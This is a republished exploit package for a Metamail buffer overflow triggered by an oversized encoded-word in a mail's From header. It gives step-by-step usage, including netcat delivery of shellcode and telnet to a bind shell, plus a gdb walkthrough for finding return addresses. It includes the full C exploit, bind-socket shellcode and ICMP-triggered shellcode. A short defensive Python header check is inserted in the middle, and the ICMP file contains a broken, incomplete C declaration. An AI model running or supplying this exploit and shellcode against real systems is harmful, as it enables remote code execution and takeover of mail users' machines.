
Metamail Buffer Overflow Exploit (From Header)

2004-06-17  Author: compiled by BitsCN  Source: China Network Administrators Alliance (bitsCN.com)

Summary
"Metamail is an implementation of MIME, the Multipurpose Internet Mail Extensions, a proposed standard for multimedia mail on the Internet. Metamail implements MIME, and also implements extensibility and configuration via the "mailcap" mechanism described in an informational RFC that is a companion to the MIME document".

Several vulnerabilities have been found in the product that allow a remote attacker to crash the program or execute arbitrary code (format string and buffer overflow vulnerabilities). One of these vulnerabilities can be tested with the exploit provided below.


Details
How to use this exploit?
This program exploits the Metamail buffer overflow vulnerability. Thanks to Ulf Harnhammer for the proof of concept exploit. Compile it with:
- gcc metaexpl.c -o metaexpl

and launch it with:
- ./metaexpl align retaddr

The output is a specially crafted mail. Pipe it to a file and launch Metamail.

Example:
- ./metaexpl 0 0x8054050 > mail
- metamail mail

If you have the correct align and return address, an open UDP port should appear at 13330. Search for it with:
- netstat --udp -a
- Active Internet connections (servers and established)
- Proto Recv-Q Send-Q Local Address           Foreign Address         State
- udp        0      0 *:13330                 *:*

Now you can send your shellcode to port 13330. priest added two shellcodes to my exploit: one is a TCP port bind code on port 65535, and the other code uses ICMP and the ping utility to launch code. You can send it with:
- cat bindsockshc | netcat -u yourip 13330

Or
- cat icmpshc | netcat -u yourip 13330

Now telnet to the IP address on port 65535 if you used the bind shellcode:
- telnet ipaddr 65535
- Trying ::1...
- telnet: connect to address ::1: Connection refused
- Trying 127.0.0.1...
- Connected to localhost.
- Escape character is '^]'.
- id;
- uid=100(hack) gid=100(users) groups=100(users)
- : command not found

For ICMP shellcode look at icmp.c file in this package.

How can I find the correct offset for other Linux distributions?
Align 0 and return address 0x8054050 work for German SUSE Linux 7.0. The targets are in the file "targets" in this package. Please send me the targets for your Linux distributions. If you want to exploit another distribution, you need a different align and return address. Launch the exploit with align 0 and any return address.

- ./metaexpl 1 0x41424344 > /tmp/mail

Now open gdb on the Metamail executable and run it with the mail file:

- gdb metamail
- (gdb)
- (gdb) r mail
- Starting program: /usr/bin/metamail mail

- Program received signal SIGSEGV, Segmentation fault.
- 0x68726979 in ?? ()

That is the wrong offset. Switch to another terminal and create a new mail with another offset. Positive and negative values are allowed.

- ./metaexpl 2 0x41424344 > /tmp/mail

Now in gdb:
- (gdb) r mail
- The program being debugged has been started already.
- Start it from the beginning? (y or n) y
- Starting program: /usr/bin/metamail mail

- Program received signal SIGSEGV, Segmentation fault.
- 0x61626364 in ?? ()
- (gdb)

Now we have the correct offset (ABCD is normally \x41\x42\x43\x44 in hex, but Metamail adds 0x20 to each byte). Let's search for the return address (it is located on the heap):
- (gdb) maintenance info sections
- ...
- 0x08053080->0x08053450 at 0x0000a080: .data ALLOC LOAD DATA HAS_CONTENTS
- 0x08053450->0x08053454 at 0x0000a450: .eh_frame ALLOC LOAD DATA HAS_CONTENTS
- 0x08053454->0x0805345c at 0x0000a454: .ctors ALLOC LOAD DATA HAS_CONTENTS
- 0x0805345c->0x08053464 at 0x0000a45c: .dtors ALLOC LOAD DATA HAS_CONTENTS
- 0x08053464->0x08053558 at 0x0000a464: .got ALLOC LOAD DATA HAS_CONTENTS
- 0x08053558->0x080535f8 at 0x0000a558: .dynamic ALLOC LOAD DATA HAS_CONTENTS
- 0x08053600->0x08053e50 at 0x0000a600: .bss ALLOC
- 0x00000000->0x0000017c at 0x0000a600: .comment READONLY HAS_CONTENTS
- 0x08053e50->0x08053f18 at 0x0000a77c: .note READONLY HAS_CONTENTS
- ^^^^^^^^^^

Now search for the NOPs (The heap is after 0x08053f18):
- (gdb) x/1000x 0x08053f18
- 0x8053f18: 0x08053f68 0xffffffff 0xffffffff 0x00000000
- 0x8053f28: 0x00000000 0x00000000 0x00000000 0x00000000
- 0x8053f38: 0x00000000 0x00000000 0x00000000 0x00000000
- 0x8053f48: 0x00000000 0x00000000 0x00000000 0x00000000
- 0x8053f58: 0x00000000 0x00000000 0x00000000 0x400f5d80
- 0x8053f68: 0x00000000 0x00000000 0x00000000 0x00000000
- 0x8053f78: 0x00000000 0x00000000 0x00000000 0x000003f1
- 0x8053f88: 0x485f4d4d 0x45444145 0x0a3d5352 0x6d6f7246
- 0x8053f98: 0x3f3d203a 0x47474747 0x47474747 0x47474747
- 0x8053fa8: 0x47474747 0x47474747 0x47474747 0x47474747
- 0x8053fb8: 0x47474747 0x47474747 0x47474747 0x47474747
- 0x8053fc8: 0x47474747 0x47474747 0x47474747 0x47474747
- 0x8053fd8: 0x47474747 0x47474747 0x47474747 0x47474747
- 0x8053fe8: 0x47474747 0x47474747 0x47474747 0x47474747
- 0x8053ff8: 0x47474747 0x47474747 0x47474747 0x47474747
- 0x8054008: 0x47474747 0x47474747 0x47474747 0x47474747
- 0x8054018: 0x47474747 0x47474747 0x47474747 0x47474747
- 0x8054028: 0x47474747 0x47474747 0x47474747 0x47474747
- ...

0x47474747 is the NOP byte ('G'). Every address that holds 0x47474747 is a valid return address. Take an address in the middle of the NOP buffer; 0x8053fc8 is a good one, for example. Ok, we have our values. We can exploit it:
- metaexpl 2 0x8053fc8 > /tmp/mail
- metamail /tmp/mail
- netstat --udp -a
- Active Internet connections (servers and established)
- Proto Recv-Q Send-Q Local Address           Foreign Address         State
- udp        0      0 *:13330                 *:*

Exploit:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// Standard buffer size for vuln buffer
#define STDBUFSIZ 560

// Udp Port 13330 for shellcode
#define PORT "\x34\x12"

#define NOP 'G'

// Shellcode, which waits for another shellcode on udp port PORT and
// launches it. Special thanks to:
//** gunzip@ircnet <techieone@softhome.net>
//** http://members.xoom.it/gunzip
// for his wonderful shellcode.

char shellcode[]=
  "\x31\xc0\x31\xdb\x43\x50\x6a\x02\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
  "\x4b\x53\x53\x53\x66\x68" PORT "\x66\x6a\x02\x89\xe1\x6a\x16\x51"
  "\x50\x89\xe1\xb3\x02\x6a\x66\x58\xcd\x80\x8b\x1c\x24\x99\x66\xba"
  "\xff\xff\x29\xd4\x89\xe1\xb0\x03\xcd\x80\xff\xe1";

// Generate random nop data.
int gen_nops(char *buffer, int size)
{
  int i, num;
  FILE *file;

  // Open urandom for srandom
  file = fopen("/dev/urandom", "r");
  if(file == NULL)
    return -1;

  // Iterate size times
  for(i=0;i<size;i++)
  {
    // Read random data for srandom
    num = fgetc(file);

    // Set random number seed
    srandom(num);

    // Get random value
    num = random() % 26;

    // Add num to 'A' (65), so the output is always upper-case letters.
    buffer[i] = 65 + num;
  }

  // close urandom
  fclose(file);

  return 0;
}

// Usage for wrong command line parameters
void usage(char *argv)
{
 printf("\n%s align retaddr\n", argv);
}

// Start of the exploit
int main(int argc, char **argv)
{
 char *buf;
 char *p;
 unsigned long retaddr;
 int align;

 if(argc != 3)
 {
  usage(argv[0]);
  exit(-1);
 }

 // Align and return address
 align = atoi(argv[1]);
 retaddr = strtoul(argv[2], 0, 0);

 // Get memory for our vuln buffer (one extra byte for the terminator)
 buf = (char*) malloc(STDBUFSIZ+align+1);
 if(buf == NULL)
 {
  perror("malloc");
  exit(-1);
 }

 // Pointer to buf
 p = buf;

 // Set random nops (My last project. Use my function if you want,
 // to evade Intrusion detection systems). If you want the whitepaper
 // to the code, go to http://www.priestmaster.org/mypapers/nops.tgz
 // gen_nops(buf, STDBUFSIZ+align);
 memset(buf, NOP, STDBUFSIZ+align);

 // Copy the shellcode into the buffer
 memcpy(p+STDBUFSIZ-4-strlen(shellcode), shellcode, strlen(shellcode));

 // Set return address
 p += STDBUFSIZ+align-4;
 *((unsigned long *)p) = retaddr;

 // Null terminate (last valid index of the allocation)
 buf[STDBUFSIZ+align] = 0;

 // Generate vuln mail
 // Change this to your values if you want.
 printf("From: =?");
 printf("%s?Q?test_?= <metaur@localhost>\n", buf);
 printf("To: <metaur@localhost>\n");
 printf("Subject: Testmail 3: Message for you\n");
 printf("MIME-Version: 1.0\n");
 printf("Content-Type: text/whatever\n\n");
 printf("Testmail 3");

 return 0;
}
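A defender-side check for the header shape this exploit produces: the From: line carries an RFC 2047 encoded-word (=?charset?Q?text?=) whose charset slot holds the 560-byte NOP padding, shellcode and return address instead of a charset name. The Python below is an added example, not part of the original package; the thresholds (a 40-byte charset slot, the 75-byte encoded-word limit from RFC 2047) and the sample headers are constructed here.

```python
import re

# RFC 2047 encoded-word: =?charset?encoding?encoded-text?=  ('?' cannot occur inside the three parts)
ENCODED_WORD = re.compile(rb"=\?([^?]*)\?([bBqQ])\?([^?]*)\?=")
# The charset slot is an RFC 2047 token; registered charset names (plus a '*lang' suffix) fit this allowlist
CHARSET_TOKEN = re.compile(rb"[A-Za-z0-9_\-*]+")
MAX_ENCODED_WORD = 75   # RFC 2047 section 2: an encoded-word may not exceed 75 characters
MAX_CHARSET = 40        # assumption: generous for real charset names, far below the 560+ bytes the exploit needs

def check_header(header_line, max_charset=MAX_CHARSET, max_word=MAX_ENCODED_WORD):
    """Return a list of findings for one raw (bytes) header line; an empty list means nothing suspicious."""
    name, _, value = header_line.partition(b":")
    field = name.strip().decode("ascii", "replace")
    findings = []
    pos = value.find(b"=?")
    while pos != -1:
        m = ENCODED_WORD.match(value, pos)
        if m is None:
            # an "=?" that never closes properly is not RFC 2047 at all; flag it and stop
            findings.append(f"{field}: unterminated encoded-word at offset {pos}")
            break
        charset = m.group(1)
        if len(charset) > max_charset:
            findings.append(f"{field}: charset field is {len(charset)} bytes")
        if not CHARSET_TOKEN.fullmatch(charset):
            findings.append(f"{field}: charset field contains non-token bytes")
        if m.end() - m.start() > max_word:
            findings.append(f"{field}: encoded-word is {m.end() - m.start()} bytes (limit {max_word})")
        pos = value.find(b"=?", m.end())
    return findings

def scan_headers(message):
    """Unfold (RFC 5322) and check every header line of a raw message; stops at the first blank line."""
    head = message.split(b"\n\n", 1)[0]
    unfolded = re.sub(rb"\r?\n[ \t]+", b" ", head)
    findings = []
    for line in unfolded.split(b"\n"):
        findings.extend(check_header(line.rstrip(b"\r")))
    return findings

# Constructed samples (not from the original page). OVERSIZED has the shape the exploit emits:
# a charset slot filled with 'G' NOP bytes, ending in a couple of non-ASCII bytes.
BENIGN = b"From: =?ISO-8859-1?Q?Andr=E9_M=FCller?= <andre@example.org>"
OVERSIZED = b"From: =?" + b"G" * 560 + b"\x89\xe1" + b"?Q?test_?= <metaur@localhost>"
UNTERMINATED = b"Subject: =?" + b"A" * 100 + b" no closing delimiter"
MESSAGE = (OVERSIZED + b"\nTo: <metaur@localhost>\nSubject: Testmail 3: Message for you\n"
           b"MIME-Version: 1.0\nContent-Type: text/whatever\n\nTestmail 3")

if __name__ == "__main__":
    for sample in (BENIGN, OVERSIZED, UNTERMINATED):
        print(check_header(sample) or ["clean"])
    print(scan_headers(MESSAGE))
```

The same check applies to any header that accepts encoded-words (Subject:, To:, Cc:), which is why scan_headers walks the whole header block rather than only From:.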

bindsockshc.c:
/* Copyright (c) Ramon de Carvalho Valle, July 2003 */
/* x86/linux bind socket shellcode */

#include <stdio.h>

char shellcode[]= /* 72 bytes */
  "\x31\xdb"              /* xorl %ebx,%ebx */
  "\xf7\xe3"              /* mull %ebx */
  "\x53"                  /* pushl %ebx */
  "\x43"                  /* incl %ebx */
  "\x53"                  /* pushl %ebx */
  "\x6a\x02"              /* pushl $0x02 */
  "\x89\xe1"              /* movl %esp,%ecx */
  "\xb0\x66"              /* movb $0x66,%al */
  "\xcd\x80"              /* int $0x80 */
  "\xff\x49\x02"          /* decl 0x02(%ecx) */
  "\x6a\x10"              /* pushl $0x10 */
  "\x51"                  /* pushl %ecx */
  "\x50"                  /* pushl %eax */
  "\x89\xe1"              /* movl %esp,%ecx */
  "\x43"                  /* incl %ebx */
  "\xb0\x66"              /* movb $0x66,%al */
  "\xcd\x80"              /* int $0x80 */
  "\x89\x41\x04"          /* movl %eax,0x04(%ecx) */
  "\xb3\x04"              /* movb $0x04,%bl */
  "\xb0\x66"              /* movb $0x66,%al */
  "\xcd\x80"              /* int $0x80 */
  "\x43"                  /* incl %ebx */
  "\xb0\x66"              /* movb $0x66,%al */
  "\xcd\x80"              /* int $0x80 */
  "\x59"                  /* popl %ecx */
  "\x93"                  /* xchgl %eax,%ebx */
  "\xb0\x3f"              /* movb $0x3f,%al */
  "\xcd\x80"              /* int $0x80 */
  "\x49"                  /* decl %ecx */
  "\x79\xf9"              /* jns <bindsocketshellcode+45> */
  "\x68\x2f\x2f\x73\x68"  /* pushl $0x68732f2f */
  "\x68\x2f\x62\x69\x6e"  /* pushl $0x6e69622f */
  "\x89\xe3"              /* movl %esp,%ebx */
  "\x50"                  /* pushl %eax */
  "\x53"                  /* pushl %ebx */
  "\x89\xe1"              /* movl %esp,%ecx */
  "\xb0\x0b"              /* movb $0x0b,%al */
  "\xcd\x80"              /* int $0x80 */
;

int main(void)
{
  void (*dsr) ();
  /* Jump to the shellcode bytes as if they were a function */
  dsr = (void (*)()) shellcode;
  printf("Size: %d bytes.\n", (int) sizeof(shellcode));
  dsr();
  return 0;
}

icmpshc.c:
/*
 x86 linux icmp bind shellcode (137 bytes) by gloomy@netric.org

[example]

 main:/home/gloomy/security/shellcode/linux/icmp# ./icmp
 Size of shellcode = 137

 main:/home/gloomy/security/shellcode/linux/icmp# ping -p 992f7573722f62696e2f69643e6f7574 -c 1 -s 26 localhost
 PATTERN: 0x992f7573722f62696e2f69643e6f7574 (\x99/usr/bin/id>out)
 34 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.5 ms
 main:/home/gloomy/security/shellcode/linux/icmp# cat out
 uid=0(root) gid=0(root) groups=0(root)
 main:/home/gloomy/security/shellcode/linux/icmp#

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define SECRET_CHAR "\x99"

char shell[] =
 "\x31\xc0\x31\xdb\x31\xc9\xb0\x66"
 "\x43\x41\x51\xb1\x03\x51\x49\x51"
 "\x89\xe1\xcd\x80\x89\xc2\xb0\x02"
 "\xcd\x80\x31\xdb\x39\xc3\x75\x55"
 "\x31\xc0\x31\xdb\xb0\x10\x50\xb0"
 "\xff\x54\x54\x53\x50\x55\x52\x89"
 "\xe1\xb0\x66\xb3\x0c\xcd\x80\x89"
 "\xe9\x01\xc1\x31\xc0\x88\x41\xfe"
 "\xb0\x25\x01\xc5\xb0" SECRET_CHAR
 "\x32\x45\xff\x75\xd5\xb0\x02\xcd"
 "\x80\x31\xdb\x39\xc3\x74\x25\xeb"
 "\xc9\x31\xc0\x31\xdb\xb3\x02\xb0"
 "\x06\xcd\x80\x5b\x89\xd9\x88\x43"
 "\x07\x80\xc1\x08\x50\x55\x51\x53"
 "\x89\xe1\x99\xb0\x0b\xcd\x80\x31"
 "\xc0\x40\xcd\x80\xe8\xd8\xff\xff"
 "\xff"
 "/bin/sh -c";

/* Assembly source of the shellcode above (one string literal per line) */
void asm_code() {
 __asm(
  "xorl %eax,%eax\n"
  "xorl %ebx,%ebx\n"
  "xorl %ecx,%ecx\n"
  "movb $0x66,%al\n"
  "incl %ebx\n"
  "incl %ecx\n"
  "push %ecx\n"
  "movb $0x3,%cl\n"
  "push %ecx\n"
  "decl %ecx\n"
  "push %ecx\n"
  "movl %esp,%ecx\n"
  "int $0x80\n"            /* socket(); */
  "movl %eax,%edx\n"

  "movb $0x2,%al\n"
  "int $0x80\n"            /* fork(); */
  "xorl %ebx,%ebx\n"
  "cmpl %eax,%ebx\n"
  "jne exit\n"

  "endlessloop:\n"
  "xorl %eax,%eax\n"
  "xorl %ebx,%ebx\n"
  "movb $0x10,%al\n"
  "push %eax\n"
  "movb $0xff,%al\n"
  "push %esp\n"
  "push %esp\n"
  "push %ebx\n"
  "push %eax\n"
  "push %ebp\n"
  "push %edx\n"
  "movl %esp,%ecx\n"
  "movb $0x66,%al\n"
  "movb $0x0c,%bl\n"
  "int $0x80\n"            /* recvfrom(); */

  "movl %ebp,%ecx\n"
  "addl %eax,%ecx\n"
  "xorl %eax,%eax\n"
  "movb %al,-2(%ecx)\n"
  "movb $0x25,%al\n"
  "addl %eax,%ebp\n"
  "movb $0x99,%al\n"       /* SECRET_CHAR */
  "xorb -1(%ebp),%al\n"
  "jnz endlessloop\n"

  "movb $0x2,%al\n"
  "int $0x80\n"            /* fork(); */
  "xorl %ebx,%ebx\n"
  "cmpl %eax,%ebx\n"
  "je stack\n"
  "jmp endlessloop\n"
  "execve:\n"
  "xorl %eax,%eax\n"
  "xorl %ebx,%ebx\n"
  "movb $0x2,%bl\n"
  "movb $0x6,%al\n"
  "int $0x80\n"            /* close(); */

  "pop %ebx\n"
  "movl %ebx,%ecx\n"
  "movb %al,0x7(%ebx)\n"
  "addb $0x8,%cl\n"
  "push %eax\n"
  "push %ebp\n"
  "push %ecx\n"
  "push %ebx\n"
  "movl %esp,%ecx\n"
  "cdq\n"
  "movb $0xb,%al\n"
  "int $0x80\n"            /* execve(); */
  "exit:\n"
  "xorl %eax,%eax\n"
  "incl %eax\n"
  "int $0x80\n"            /* exit(); */
  "stack:\n"
  "call execve\n"
  ".string \"/bin/sh -c\"\n"
 );
}

/* C equivalent of the shellcode (reference only; not called from main) */
void c_code() {
 int fd;
 int nb = 0;
 struct sockaddr_in them;
 socklen_t them_size = sizeof(struct sockaddr);
 char buf[256];
 char *prog[] = ; /* initializer is missing from this copy of the source */

 fd = socket(2,3,1);
 if (fork() > 0) exit(0);
 while (1) {
  while (!(nb = recvfrom(fd,buf,255,0,(struct sockaddr *)&them,&them_size)));
  buf[nb-1] = 0;
  /* SECRET_CHAR is a string; compare its first byte */
  if (buf[36] == SECRET_CHAR[0])
   if (fork() == 0) { close(2); execve(prog[0],prog,NULL); }
 }
}

int main(int c,char *v[]) {
 void (*i)();
 i = (void (*)())shell;
 fprintf(stderr,"Size of shellcode = %d\n\n",(int)strlen(shell));
 i();
 return 0;
}
